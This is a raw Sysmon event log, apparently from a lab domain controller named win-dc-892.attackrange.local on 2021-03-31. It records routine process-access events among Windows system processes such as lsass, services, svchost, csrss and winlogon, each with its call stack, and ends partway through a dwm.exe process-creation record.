12:00:44.690{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0E00-00000000AE01}10801348C:\Windows\system32\LogonUI.exe{266CAFBE-646A-6064-0900-00000000AE01}788C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+50ff4|C:\Windows\System32\RPCRT4.dll+24e40|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001158Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001157Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001156Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001155Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001154Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646A-6064-0A00-00000000AE01}8401108C:\Windows\system32\services.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+ddc1|C:\Windows\system32\services.exe+d3ee|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001153Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.690{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0A00-00000000AE01}8401092C:\Windows\system32\services.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0A00-00000000AE01}8401248C:\Windows\system32\services.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0800-00000000AE01}704720C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.674{266CAFBE-646A-6064-0900-00000000AE01}7881068C:\Windows\system32\winlogon.exe{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:44.680{266CAFBE-646C-6064-1400-00000000AE01}1240C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window 